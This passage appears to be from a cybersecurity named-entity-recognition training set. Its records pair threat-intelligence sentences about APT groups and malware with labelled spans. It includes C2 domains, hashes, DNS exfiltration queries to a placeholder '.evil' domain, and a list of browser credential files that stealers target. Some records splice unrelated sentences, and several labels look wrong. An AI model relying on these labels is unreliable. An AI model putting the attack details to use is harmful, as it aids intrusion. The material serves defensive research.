16 organizations in at least 13 different countries , sometimes simultaneously , since at least 2014 . 
all ANEL samples whose version is 5.3.0 or later are obfuscated with opaque predicates and control flow flattening . The first it Uses and APIs To test for a Debugger attached or Sandbox environment by making a call to with Flag specified , then call to retrieve the addresses of the allocated pages that has been written to since the allocation or the writetrack state has been reset .", "spans": {"MALWARE: Red Alert code": [[241, 255]], "THREAT_ACTOR: group": [[339, 344]], "MALWARE: ANEL": [[478, 482]], "SYSTEM: Sandbox environment": [[653, 672]]}, "info": {"id": "cyberner_stix_train_006357", "source": "cyberner_stix_train"}} {"text": "While most of these organizations were based in Singapore , some were multinational organizations with a presence in Singapore . The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites .", "spans": {"TOOL: NSA": [[215, 218]], "VULNERABILITY: exploits": [[219, 227]]}, "info": {"id": "cyberner_stix_train_006358", "source": "cyberner_stix_train"}} {"text": "Code to check the existence of SafetyNet Google API It also checks if the Android SafetyNet is active and reporting back to the C2 . Like the Moafee group , we observed DragonOK running HTRAN to proxy their C2 servers , which are also operated on CHINANET but are hosted in the Jiangsu Province . ShadowHammer : asushotfix.com . 
We expect KillNet and its affiliates to continue conducting distributed denial - of - service ( DDoS ) and hack - and - leak operations intended to disrupt government and critical infrastructure functions in countries providing financial , economic , diplomatic or military support to Ukraine .", "spans": {"SYSTEM: Google API": [[41, 51]], "SYSTEM: Android": [[74, 81]], "THREAT_ACTOR: Moafee group": [[142, 154]], "THREAT_ACTOR: DragonOK": [[169, 177]], "TOOL: HTRAN": [[186, 191]], "THREAT_ACTOR: ShadowHammer": [[297, 309]], "URL: asushotfix.com": [[312, 326]]}, "info": {"id": "cyberner_stix_train_006359", "source": "cyberner_stix_train"}} {"text": "We end this section with a discussion on tools related to FakeM and used by Scarlet Mimic . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": {"TOOL: FakeM": [[58, 63]], "THREAT_ACTOR: Scarlet Mimic": [[76, 89]], "THREAT_ACTOR: Lazarus Group": [[110, 123]], "MALWARE: WannaCry": [[144, 152]], "ORGANIZATION: Microsoft customers": [[197, 216]]}, "info": {"id": "cyberner_stix_train_006360", "source": "cyberner_stix_train"}} {"text": "Ben Baker , Edmund Brumaghin and Jonah Samost of Talos have a fantastic write-up of this process here .", "spans": {"ORGANIZATION: Talos": [[49, 54]]}, "info": {"id": "cyberner_stix_train_006361", "source": "cyberner_stix_train"}} {"text": "When attackers used Winnti to maintain access to web servers , they hid the implant in plain sight by masquerading it as a trusted , legitimate file .", "spans": {"MALWARE: Winnti": [[20, 26]]}, "info": {"id": "cyberner_stix_train_006362", "source": "cyberner_stix_train"}} {"text": "When the botnet came back online , TA505 campaigns quickly returned , usually at even greater scale than before the disruption .", "spans": {"THREAT_ACTOR: TA505": [[35, 40]]}, "info": {"id": "cyberner_stix_train_006363", "source": "cyberner_stix_train"}} {"text": "In a recent attack , APT33 
sent spear-phishing emails to workers in the aviation industry . The UPX gave a warning message about memory buffer overflow .", "spans": {"THREAT_ACTOR: APT33": [[21, 26]], "ORGANIZATION: aviation industry": [[72, 89]], "TOOL: UPX": [[96, 99]]}, "info": {"id": "cyberner_stix_train_006364", "source": "cyberner_stix_train"}} {"text": "In the 2016 version , the value of the User-Agent header changed , as did the method of generating the relative path in the URL : now the part before /index.php is a mix of a pronounceable ( if not entirely meaningful ) word and random letters and numbers , for example , “ muromec280j9tqeyjy5sm1qy71 ” or “ parabbelumf8jgybdd6w0qa0 ” . TG-3390 uses the PlugX remote access tool . We also considered the move as an obfuscation technique , as it was mixed with a lot of script kiddie activities that can easily be mistaken for grey noise online . In its spear phish , CloudLook also used a self - extracting archive containing a PDF file that lured its victims with information regarding world terrorism .", "spans": {"THREAT_ACTOR: TG-3390": [[337, 344]], "TOOL: PlugX remote access tool": [[354, 378]], "MALWARE: CloudLook": [[567, 576]]}, "info": {"id": "cyberner_stix_train_006365", "source": "cyberner_stix_train"}} {"text": "Some of them like takephoto , takevideo , recordaudio , getsentsms and uploadpictures are focused on espionage activities . While investigating one of these infections involving White Lambert ( network-driven implant ) and Blue Lambert ( active implant ) , we found yet another family of tools that appear to be related . The IXESHE attackers are notable for their use of compromised machines within a target ’s internal network as C&C servers . 
In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n’t granular enough .", "spans": {"TOOL: White Lambert": [[178, 191]], "TOOL: Blue Lambert": [[223, 235]], "THREAT_ACTOR: IXESHE": [[326, 332]], "TOOL: C&C": [[432, 435]], "SYSTEM: Google Analytics platform": [[453, 478]], "ORGANIZATION: CSP": [[631, 634]]}, "info": {"id": "cyberner_stix_train_006366", "source": "cyberner_stix_train"}} {"text": "Gorgon Group used common URL shortening services to download payloads . According to Cheetah Mobile’s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK .", "spans": {"THREAT_ACTOR: Gorgon Group": [[0, 12]], "FILEPATH: Batmobi": [[178, 185]], "FILEPATH: Duapps": [[188, 194]], "FILEPATH: Cheetah SDK": [[213, 224]]}, "info": {"id": "cyberner_stix_train_006367", "source": "cyberner_stix_train"}} {"text": "Our team went ahead and hunted for samples of the app and analyzed it in our labs . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government , with a mission that would benefit nation-state geopolitical and economic needs .", "spans": {"MALWARE: BalkanDoor": [[117, 127]], "VULNERABILITY: CVE-2018-20250": [[312, 326]], "ORGANIZATION: Iranian Government": [[433, 451]], "ORGANIZATION: nation-state geopolitical": [[488, 513]], "ORGANIZATION: economic": [[518, 526]]}, "info": {"id": "cyberner_stix_train_006368", "source": "cyberner_stix_train"}} {"text": "Some of the settings are Boolean values that act as switches . 
Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . However , they later continued by making modifications to the Excel document just prior to the attack on August 26th .", "spans": {"MALWARE: RIPPER": [[121, 127]]}, "info": {"id": "cyberner_stix_train_006369", "source": "cyberner_stix_train"}} {"text": "Officials at BLU could n't be immediately reached for comment . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . C2 : phot.healthsvsolu.com .", "spans": {"ORGANIZATION: BLU": [[13, 16]], "THREAT_ACTOR: threat groups": [[154, 167]], "VULNERABILITY: CVE-2018-0798": [[186, 199]], "TOOL: RTF weaponizer": [[209, 223]], "TOOL: C2": [[226, 228]], "DOMAIN: phot.healthsvsolu.com": [[231, 252]]}, "info": {"id": "cyberner_stix_train_006370", "source": "cyberner_stix_train"}} {"text": "Given that both organizations appear to describe similar ( if not identical ) activity , any reasonable person could ( and should ) ask – why the inconsistency in naming and identification .", "spans": {}, "info": {"id": "cyberner_stix_train_006371", "source": "cyberner_stix_train"}} {"text": "ELF Utilities 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 This seems confusing as FireEye earlier publicly declared the \" TRITON actor \" as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" . The domains were registered in November 2019 and operationalized shortly after . 
To prevent ProxyNotShell exploitation on older Microsoft Exchange servers , Microsoft released a blog4 advocating for a custom inside the Microsoft IIS server supporting Exchange .", "spans": {"ORGANIZATION: FireEye": [[298, 305]], "TOOL: TRITON": [[338, 344]], "ORGANIZATION: research institution": [[396, 416]], "THREAT_ACTOR: TEMP.Veles": [[442, 452]], "SYSTEM: Microsoft Exchange servers": [[585, 611]], "ORGANIZATION: Microsoft": [[614, 623]]}, "info": {"id": "cyberner_stix_train_006372", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //apple-icloud [ . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . The send counter is also passed to the AdrGen function as the part number parameter and is visible in the query string as depicted below: Query: 239e965ec000a60000B6C90T.COCTab33333233332222222222222222210100A3280AAAAAAAAAAAAAAAAA.33333210100A.sample-domain.evil , Response: 39.2.3.1 , Query: 230019e965eca60000A16DC20T.EBB466767667256666772556776662FBFD932F3F64079E4F730B65239FE0.33333210100A.sample-domain.evil , Response: 39.2.3.2 , Query: 392e002965eca60000C6D18C42T.33232333332333500262233332466710E0E18362E239DDA839020190D932.33333210100A.sample-domain.evil . 
Attacks start with VBA code to decode the next malware stage All campaigns start with Microsoft Office documents , which are possibly sent to the targets as email attachments .", "spans": {"ORGANIZATION: governments": [[169, 180]], "ORGANIZATION: militaries": [[185, 195]], "ORGANIZATION: defense attaches": [[198, 214]], "ORGANIZATION: media entities": [[217, 231]], "ORGANIZATION: dissidents": [[238, 248]], "ORGANIZATION: figures": [[253, 260]], "MALWARE: AdrGen": [[344, 350]], "FILEPATH: 239e965ec000a60000B6C90T.COCTab33333233332222222222222222210100A3280AAAAAAAAAAAAAAAAA.33333210100A.sample-domain.evil": [[450, 567]], "IP_ADDRESS: 39.2.3.1": [[580, 588]], "FILEPATH: 230019e965eca60000A16DC20T.EBB466767667256666772556776662FBFD932F3F64079E4F730B65239FE0.33333210100A.sample-domain.evil": [[598, 717]], "IP_ADDRESS: 39.2.3.2": [[730, 738]], "FILEPATH: 392e002965eca60000C6D18C42T.33232333332333500262233332466710E0E18362E239DDA839020190D932.33333210100A.sample-domain.evil": [[748, 868]]}, "info": {"id": "cyberner_stix_train_006373", "source": "cyberner_stix_train"}} {"text": "If an intruder compromises a computer that has been onboarded to Windows Defender ATP , SOC personnel can isolate the computer from the network , blocking command and control of the implant and preventing attackers from installing additional malware and moving laterally to other computers in the network .", "spans": {"TOOL: Windows Defender ATP": [[65, 85]]}, "info": {"id": "cyberner_stix_train_006374", "source": "cyberner_stix_train"}} {"text": "The group installed multiple tools within the environment , including three different tools on a strategically important server , likely to provide contingency access options .", "spans": {}, "info": {"id": "cyberner_stix_train_006375", "source": "cyberner_stix_train"}} {"text": "Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around 
the world . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page .", "spans": {"THREAT_ACTOR: MSS": [[73, 76]], "FILEPATH: .lnk file": [[245, 254]], "SYSTEM: Windows": [[287, 294]], "FILEPATH: .wsc": [[317, 321]]}, "info": {"id": "cyberner_stix_train_006376", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //mailsa-wqp [ . For full details , please reference our 2014 report , APT28 : A Window into Russia 's Cyber Espionage Operations . The differences between PoisonFrog and Glimpse highlight the ease at which adversaries can modify their tools to meet their end . The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications .", "spans": {"THREAT_ACTOR: APT28": [[84, 89]], "MALWARE: PoisonFrog": [[169, 179]], "MALWARE: Glimpse": [[184, 191]], "THREAT_ACTOR: Winnti group": [[279, 291]], "ORGANIZATION: pharmaceutics": [[356, 369]], "ORGANIZATION: telecommunications": [[374, 392]]}, "info": {"id": "cyberner_stix_train_006377", "source": "cyberner_stix_train"}} {"text": "'' The trojan calls this function with the action GLOBAL_ACTION_BACK , which equals the pressing of the back button on the device , thus canceling the opening of the anti-virus application . The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon . While researching these attacks , we discovered an undocumented , custom malware family – which we ’ve named Dudell . 
Adversaries may perform data destruction over the course of an operation .", "spans": {"MALWARE: .exe file": [[215, 224]], "MALWARE: Microsoft Word file": [[252, 271]], "MALWARE: Dudell": [[449, 455]], "ORGANIZATION: Adversaries": [[458, 469]]}, "info": {"id": "cyberner_stix_train_006378", "source": "cyberner_stix_train"}} {"text": "key3.db Firefox private keys ( now named key4.db ) cert8.db Firefox certificate database logins.json Firefox encrypted password database account.cfn The Bat ! ( email client ) account credentials wand.dat Opera password database .", "spans": {"FILEPATH: key3.db": [[0, 7]], "TOOL: Firefox": [[8, 15], [60, 67], [101, 108]], "FILEPATH: key4.db": [[41, 48]], "FILEPATH: cert8.db": [[51, 59]], "FILEPATH: logins.json": [[89, 100]], "FILEPATH: account.cfn": [[137, 148]], "TOOL: email": [[161, 166]], "FILEPATH: wand.dat": [[196, 204]], "TOOL: Opera": [[205, 210]]}, "info": {"id": "cyberner_stix_train_006379", "source": "cyberner_stix_train"}} {"text": "Symantec saw the first evidence of Sowbug-related activity with the discovery in March 2017 of an entirely new piece of malware called Felismus used against a target in Southeast Asia . As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "TOOL: Felismus": [[135, 143]], "ORGANIZATION: Kurdish activists": [[307, 324]], "THREAT_ACTOR: Flying Kitten actor group": [[369, 394]]}, "info": {"id": "cyberner_stix_train_006380", "source": "cyberner_stix_train"}} {"text": "This signals just how long ago the Poseidon threat actor was already working on its offensive framework . 
The Sogu gang , in contrast , use PDF and DOC files in very tailored , targeted emails .", "spans": {"THREAT_ACTOR: Poseidon threat actor": [[35, 56]], "MALWARE: PDF": [[140, 143]], "MALWARE: DOC files": [[148, 157]], "TOOL: emails": [[186, 192]]}, "info": {"id": "cyberner_stix_train_006381", "source": "cyberner_stix_train"}} {"text": "Instead , sensitive KHNP documents were leaked by the actors as part of an effort to exaggerate the access they had and embarrass the South Korean Government , a technique we assess North Korea would turn to again in order to instill fear and/or meet domestic propaganda aims . NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns .", "spans": {"MALWARE: KHNP documents": [[20, 34]], "THREAT_ACTOR: actors": [[54, 60]], "ORGANIZATION: South Korean Government": [[134, 157]], "MALWARE: NetTraveler": [[278, 289]], "ORGANIZATION: diplomats": [[314, 323]], "ORGANIZATION: embassies": [[326, 335]], "ORGANIZATION: government institutions": [[340, 363]]}, "info": {"id": "cyberner_stix_train_006382", "source": "cyberner_stix_train"}} {"text": "The Sofacy developer modified the f4player ’s ActionScript to include additional code to load an embedded Flash object .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]], "TOOL: f4player": [[34, 42]], "TOOL: ActionScript": [[46, 58]], "TOOL: Flash": [[106, 111]]}, "info": {"id": "cyberner_stix_train_006383", "source": "cyberner_stix_train"}} {"text": "A fake alert will notify and urge the user to access the malicious domain and download XLoader . We identified this APT group coded as ‘APT-C-35’ in 2017 , who is mainly targeting Pakistan and other South Asian countries for cyber espionage . 
If the host is successfully reached , the script renames a file named “ kernel.dll ” , obviously not the real one , in “ uninstall.exe ” , another misleading name .", "spans": {"MALWARE: XLoader": [[87, 94]], "THREAT_ACTOR: ‘APT-C-35’": [[135, 145]], "FILEPATH: kernel.dll": [[315, 325]], "FILEPATH: uninstall.exe": [[364, 377]]}, "info": {"id": "cyberner_stix_train_006384", "source": "cyberner_stix_train"}} {"text": "What ’ s innovative about this ransomware is how it displays its ransom note . Additionally , during that time , members of Gorgon Group were also performing criminal operations against targets across the globe , often using shared infrastructure with their targeted attack operations . An incorrect choice of control flow dispatcher and first block ( algorithm error ) Mandiant has observed RGB units utilize a series of Operational Relay Boxes ( ORBs ) using L2TP IPsec tunnels along with commercial VPN providers to obscure their source address .", "spans": {"THREAT_ACTOR: Gorgon Group": [[124, 136]], "TOOL: shared infrastructure": [[225, 246]], "ORGANIZATION: Mandiant": [[370, 378]]}, "info": {"id": "cyberner_stix_train_006385", "source": "cyberner_stix_train"}} {"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . 
Group-IB Bot-trek TDS sensors are in place at a number of financial institutions and , unfortunately , we register that currently Corkow malware is present on 80% of protected corporate systems .", "spans": {"MALWARE: flare-qdb": [[18, 27]], "ORGANIZATION: Group-IB": [[86, 94]], "ORGANIZATION: financial institutions": [[144, 166]], "MALWARE: Corkow": [[216, 222]], "MALWARE: malware": [[223, 230]]}, "info": {"id": "cyberner_stix_train_006386", "source": "cyberner_stix_train"}} {"text": "They are both targeting businesses using accounting software , are fingerprinting systems of interest similarly , are looking for smart card readers , and finally , they deploy an array of malicious tools to spy on their victims . For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": {"ORGANIZATION: businesses": [[24, 34]], "MALWARE: FrozenCell": [[263, 273]], "MALWARE: Tawjihi 2016": [[300, 312]], "ORGANIZATION: students": [[346, 354]]}, "info": {"id": "cyberner_stix_train_006387", "source": "cyberner_stix_train"}} {"text": "In the past , the group used droppers that installed both the SPLM and AZZY backdoors on the same machine .", "spans": {"MALWARE: SPLM": [[62, 66]], "MALWARE: AZZY backdoors": [[71, 85]]}, "info": {"id": "cyberner_stix_train_006388", "source": "cyberner_stix_train"}} {"text": "And like CORESHELL , the new malware attempts to download a second-stage executable .", "spans": {"MALWARE: CORESHELL": [[9, 18]]}, "info": {"id": "cyberner_stix_train_006389", "source": "cyberner_stix_train"}} {"text": "This information stealer is augmented by a variety of components that the toolset operators may selectively include with the main component to provide additional functionalities , such as multiple methods of establishing persistence , as well as modules that attempt to exploit privilege escalation vulnerabilities in order to 
execute CosmicDuke with higher privileges .", "spans": {"TOOL: information stealer": [[5, 24]], "MALWARE: CosmicDuke": [[335, 345]]}, "info": {"id": "cyberner_stix_train_006390", "source": "cyberner_stix_train"}} {"text": "Update your device : Keep your device up-to-date with the latest security patches . While the group has not yet demonstrated an ICS capability , RASPITE 's recent targeting focus and methodology are clear indicators of necessary activity for initial intrusion operations into an IT network to prepare the way for later potential ICS events . It includes an RC4 key ( which is XORed with 0x37 ) that is used to decrypt a filename and the embedded DLL file . Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": {"THREAT_ACTOR: group": [[94, 99]], "TOOL: ICS": [[128, 131], [329, 332]], "THREAT_ACTOR: RASPITE": [[145, 152]], "ORGANIZATION: IT": [[279, 281]], "TOOL: RC4 key": [[357, 364]], "TOOL: XORed with 0x37": [[376, 391]], "TOOL: DLL": [[446, 449]], "ORGANIZATION: Talos": [[580, 585]], "TOOL: Open Babel": [[651, 661]]}, "info": {"id": "cyberner_stix_train_006391", "source": "cyberner_stix_train"}} {"text": "We therefore believe the Dukes to work either within or directly for a government , thus ruling out the possibility of a criminal gang or another third party .", "spans": {"THREAT_ACTOR: Dukes": [[25, 30]]}, "info": {"id": "cyberner_stix_train_006392", "source": "cyberner_stix_train"}} {"text": "The payload exploits a local privilege escalation vulnerability in the Windows kernel if it detects that it is running with limited privileges .", "spans": {"SYSTEM: Windows": [[71, 78]]}, "info": {"id": "cyberner_stix_train_006393", "source": "cyberner_stix_train"}} {"text": "Quasar serve does not even verify that a file was requested from the victim .", "spans": {"MALWARE: Quasar": [[0, 6]]}, 
"info": {"id": "cyberner_stix_train_006394", "source": "cyberner_stix_train"}} {"text": "In this paper we focus only on BlackEnergy samples known to be used specifically by the actors we identify as Quedagh , who seem to have a particular interest in political targets . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": {"TOOL: BlackEnergy samples": [[31, 50]], "THREAT_ACTOR: actors": [[88, 94]], "THREAT_ACTOR: Quedagh": [[110, 117]], "ORGANIZATION: political targets": [[162, 179]], "ORGANIZATION: governments": [[319, 330]], "ORGANIZATION: militaries": [[333, 343]], "ORGANIZATION: defense attaches": [[346, 362]], "ORGANIZATION: media entities": [[365, 379]], "ORGANIZATION: dissidents": [[386, 396]], "ORGANIZATION: figures": [[401, 408]], "ORGANIZATION: Russian government": [[432, 450]]}, "info": {"id": "cyberner_stix_train_006395", "source": "cyberner_stix_train"}} {"text": ") Let ’ s take a more detailed look at how this banking Trojan works . Kaspersky released a similar report about the same group under the name Carbanak in February 2015 . This version of KONNI is not designed to execute code on the infected system .", "spans": {"ORGANIZATION: Kaspersky": [[71, 80]], "THREAT_ACTOR: group": [[122, 127]], "THREAT_ACTOR: Carbanak": [[143, 151]], "MALWARE: KONNI": [[187, 192]]}, "info": {"id": "cyberner_stix_train_006396", "source": "cyberner_stix_train"}} {"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . 
In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region .", "spans": {"MALWARE: Silence.Downloader": [[17, 35]], "ORGANIZATION: FireEye 's DTI": [[137, 151]], "TOOL: emails": [[173, 179]], "FILEPATH: malicious attachments": [[191, 212]], "ORGANIZATION: banks": [[236, 241]]}, "info": {"id": "cyberner_stix_train_006397", "source": "cyberner_stix_train"}} {"text": "android.media.RINGER_MODE_CHANGED android.sms.msg.action.SMS_SEND android.sms.msg.action.SMS_DELIVERED Creating a Web Server to Phish XLoader creates a provisional web server to receive the broadcast events . From the attack activity captured this time , it is obvious that Donot APT group is still keen on Pakistan as primary target of attack , and even expands scope of attack to include Pakistani staffs and institutions in China . The script is quite different from the previous one : it guarantees its persistence on the victim machine through the setting of “ HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run ” registry key , creating a new entry named “ Windows Anytime Upgrade ” which points to “ winserv.exe ” , just stored into the same folder .", "spans": {"MALWARE: XLoader": [[134, 141]], "THREAT_ACTOR: Donot APT group": [[274, 289]], "SYSTEM: Windows": [[663, 670]], "FILEPATH: winserv.exe": [[707, 718]]}, "info": {"id": "cyberner_stix_train_006398", "source": "cyberner_stix_train"}} {"text": "Curiously , several of these have included the world \" Fateh '' in their package name , which may be referring to the Fatah political party . Lazarus attacks are not a local problem and clearly the group 's operations span across the whole world . However , the U.S. has also been a country of significant interest to the group , with 18 organizations attacked over the past three years , including a number of Fortune 500 companies . 
Almost immediately after its channel ’s creation , the group began posting files from compromised Ukrainian organizations .", "spans": {"ORGANIZATION: Fatah": [[118, 123]], "THREAT_ACTOR: group": [[198, 203]], "ORGANIZATION: Ukrainian organizations": [[533, 556]]}, "info": {"id": "cyberner_stix_train_006399", "source": "cyberner_stix_train"}} {"text": "While Orangeworm has impacted only a small set of victims in 2016 and 2017 according to Symantec telemetry , we have seen infections in multiple countries due to the nature of the victims operating large international corporations . Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar .", "spans": {"ORGANIZATION: Symantec": [[88, 96]], "MALWARE: legitimate traffic": [[250, 268]]}, "info": {"id": "cyberner_stix_train_006400", "source": "cyberner_stix_train"}} {"text": "ESET have been tracking the malicious activities related to the Ke3chang group . In some instances , APT41 leveraged POISONPLUG as a first-stage backdoor to deploy the HIGHNOON backdoor in the targeted environment . The group also deploys the SOGU and CROSSWALK malware families as means to maintain presence . APT41 sent spear-phishing emails to multiple HR employees three days after the compromise had been remediated and systems were brought back online . APT41 also deploys the SOGU and CROSSWALK malware families as means to maintain presence . Within hours of a user opening the malicious attachment dropping a HOMEUNIX backdoor , APT41 regained a foothold within the environment by installing PHOTO on the organization's servers across multiple geographic regions . Before attempting to deploy the publicly available Ransomware-as-a-Service (RaaS) Encryptor RaaS through group policy , APT41 blocked victim systems from retrieving anti-virus updates by accessing the DNS management console and implementing a forward lookup on the domain used for anti-virus updates to the park IP address 1.1.1.1 . 
APT41 has been observed creating a RAR archive of targeted files for Exfiltration . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain . During multiple engagements , APT41 attempted to remove evidence of some of its activity by deleting Bash histories , clearing Windows security and system events , and modifying DNS management to avoid anti-virus detections . Explicit financially-motivated targeting is unusual among Chinese statesponsored threat groups , and evidence suggests APT41 has conducted simultaneous cyber crime and Cyber Espionage operations from 2014 onward . APT41 operations against higher education , travel services , and news/media firms provide some indication that the group also tracks individuals and conducts surveillance . For example , the group has repeatedly targeted call record information at telecom companies . APT41 has established and maintained strategic access to organizations in the healthcare , high-tech , and telecommunications sectors . The group’s financially motivated activity has primarily focused on the video game industry , where APT41 has manipulated virtual currencies and even attempted to deploy ransomware . In another instance , APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there , suggesting the group was tasked to reconnoiter the facility for security reasons . These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns . Interestingly , despite the significant effort required to execute supply chain compromises and the large number of affected organizations , APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers . 
Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs . The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations . APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions , including publicly available utilities , malware shared with other Chinese espionage operations , and tools unique to the group . Once in a victim organization , APT41 can leverage more sophisticated TTPs and deploy additional malware . APT41 often relies on spear-phishing emails with attachments such as compiled HTML ( .chm ) files to initially compromise their victims .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: Ke3chang": [[64, 72]], "THREAT_ACTOR: APT41": [[101, 106], [311, 316], [460, 465], [638, 643], [894, 899], [1107, 1112], [1191, 1196], [1404, 1409], [1719, 1724], [1814, 1819], [2083, 2088], [2319, 2324], [2424, 2429], [2864, 2869], [3080, 3085], [3214, 3219], [3372, 3377], [3640, 3645], [3715, 3720]], "MALWARE: POISONPLUG": [[117, 127]], "MALWARE: HIGHNOON backdoor": [[168, 185]], "TOOL: emails": [[337, 343], [3752, 3758]], "MALWARE: SOGU": [[483, 487]], "MALWARE: CROSSWALK": [[492, 501]], "MALWARE: HOMEUNIX backdoor": [[618, 635]], "MALWARE: PHOTO": [[701, 706]], "ORGANIZATION: higher education": [[1839, 1855]], "ORGANIZATION: travel services": [[1858, 1873]], "ORGANIZATION: news/media firms": [[1880, 1896]], "ORGANIZATION: telecom": [[2063, 2070]], "ORGANIZATION: companies": [[2071, 2080]], "ORGANIZATION: healthcare": [[2161, 2171]], "ORGANIZATION: high-tech": [[2174, 2183]], "ORGANIZATION: telecommunications": [[2190, 2208]], "ORGANIZATION: sectors": [[2209, 2216]], "ORGANIZATION: video game industry": [[2291, 2310], [3261, 3280]], "THREAT_ACTOR: APT41’s": 
[[2666, 2673]], "MALWARE: malware families": [[3420, 3436]], "MALWARE: tools": [[3441, 3446]], "TOOL: HTML": [[3793, 3797]], "FILEPATH: .chm": [[3800, 3804]]}, "info": {"id": "cyberner_stix_train_006401", "source": "cyberner_stix_train"}} {"text": "The malware establishes persistence and sends HTTP requests to the command and control domain mailsinfo.net .", "spans": {"DOMAIN: mailsinfo.net": [[94, 107]]}, "info": {"id": "cyberner_stix_train_006402", "source": "cyberner_stix_train"}} {"text": "Utilizing Diamond Model methodology for characterizing activity by behaviors attached to victims , we began tracking TRITON S-MAL/TRISIS and immediate enabling activity as a distinct activity group ( collection of behaviors , infrastructure , and victimology ) designated XENOTIME .", "spans": {"MALWARE: TRITON S-MAL/TRISIS": [[117, 136]], "THREAT_ACTOR: XENOTIME": [[272, 280]]}, "info": {"id": "cyberner_stix_train_006403", "source": "cyberner_stix_train"}} {"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) .", "spans": {"THREAT_ACTOR: APT32": [[27, 32]], "MALWARE: Microsoft ActiveMime file": [[74, 99]], "SYSTEM: Windows": [[255, 262]], "VULNERABILITY: zero-day": [[267, 275]], "VULNERABILITY: exploit": [[276, 283]], "VULNERABILITY: CVE-2014-4148": [[286, 299]]}, "info": {"id": "cyberner_stix_train_006404", "source": "cyberner_stix_train"}} {"text": "The Ham Backdoor functions primarily as a modular platform , which provides the attacker with the ability to directly download additional modules and execute them in memory from the command and control ( C2 ) server . 
Binders are delivered by attack vectors ( such as phishing and watering hole attacks ) onto a machine .", "spans": {"TOOL: Ham Backdoor": [[4, 16]], "MALWARE: Binders": [[218, 225]]}, "info": {"id": "cyberner_stix_train_006405", "source": "cyberner_stix_train"}} {"text": "Trojan activity At the time of the writing of this post , all URLs ( see IOC section ) found on the sample were inactive , and it does not seem to be widespread . When CTU researchers first published information about LYCEUM to Secureworks Threat Intelligence clients , no public documentation on the group existed . We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission .", "spans": {"ORGANIZATION: CTU": [[168, 171]], "THREAT_ACTOR: LYCEUM": [[218, 224]], "ORGANIZATION: banks": [[350, 355]], "ORGANIZATION: media": [[358, 363]], "ORGANIZATION: government agencies": [[370, 389]], "THREAT_ACTOR: APT38": [[417, 422]]}, "info": {"id": "cyberner_stix_train_006406", "source": "cyberner_stix_train"}} {"text": "However , Proofpoint researchers have recently observed phishing attacks that incorporate all of these elements in a single , multistep scheme involving the Marcher Android banking Trojan targeting customers of large Austrian banks . North Korean dictator Kim Jong Un has set ambitious economic goals , and some cybersecurity analysts have predicted he will unleash the Pyongyang-affiliated hackers to meet those deadlines by targeting multinational companies’ trade secrets . 
